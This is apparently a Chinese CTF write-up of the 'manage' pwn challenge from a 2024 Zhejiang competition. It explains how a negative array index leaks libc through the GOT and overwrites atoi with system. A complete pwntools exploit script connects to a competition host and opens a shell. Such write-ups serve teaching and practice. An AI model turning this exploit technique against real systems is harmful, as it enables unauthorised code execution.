2024浙江通信行业职业技能竞赛 - manage

RocketDev

题目可以在Releases 附件中找到

文件属性

属性
Arch amd64
RELRO No
Canary on
NX on
PIE off
strip no
libc 2.31-0ubuntu9.16

解题思路

程序看似是菜单题,实际上没有mallocfree函数,仔细看输入的索引, 以int存储,可以为负值。因此可以查看got表来得到libc并写入其他函数。 同时菜单选项是通过atoi来转换的,因此把atoi写为system就可以方便地打开shell

EXPLOIT

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
from pwn import *
context.terminal = ['tmux','splitw','-h']
GOLD_TEXT = lambda x: f'\x1b[33m{x}\x1b[0m'
EXE = './manage'

def payload(lo:int):
global sh
if lo:
sh = process(EXE)
if lo & 2:
gdb.attach(sh)
libc = ELF('/home/Rocket/glibc-all-in-one/libs/2.31-0ubuntu9.15_amd64/libc.so.6')
else:
sh = remote('10.10.26.199', 24361)
libc = ELF('./libc-2.31.so')
elf = ELF(EXE)

def show(idx: int) -> bytes:
sh.sendlineafter(b'system---', b'2')
sh.sendlineafter(b'index', str(idx).encode())
sh.recvuntil(b':\n')
return sh.recvuntil(b'---Welcome')

def edit(idx: int, buf1: bytes, buf2: bytes):
sh.sendlineafter(b'system---', b'3')
sh.sendlineafter(b'index', str(idx).encode())
sh.sendlineafter(b'card', buf1)
sh.sendlineafter(b'name', buf2)

leak1 = show(-1)
idx = leak1.find(b': ') + 2
libcBase = u64(leak1[idx:idx + 6] + b'\0\0') - libc.symbols['_IO_2_1_stderr_']
success(GOLD_TEXT(f'Leak libcBase: {libcBase:#x}'))
libc.address = libcBase

edit(-3, p64(libc.symbols['puts']), p64(0) + p64(libc.symbols['system']))

sh.sendafter(b'system---', b'/bin/sh\0')

sh.clean()
sh.interactive()
sh.close()
  • 标题: 2024浙江通信行业职业技能竞赛 - manage
  • 作者: RocketDev
  • 创建于 : 2024-08-05 21:22:00
  • 更新于 : 2024-08-05 21:22:00
  • 链接: https://rocketmadev.github.io/2024/08/05/manage/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
评论
目录
2024浙江通信行业职业技能竞赛 - manage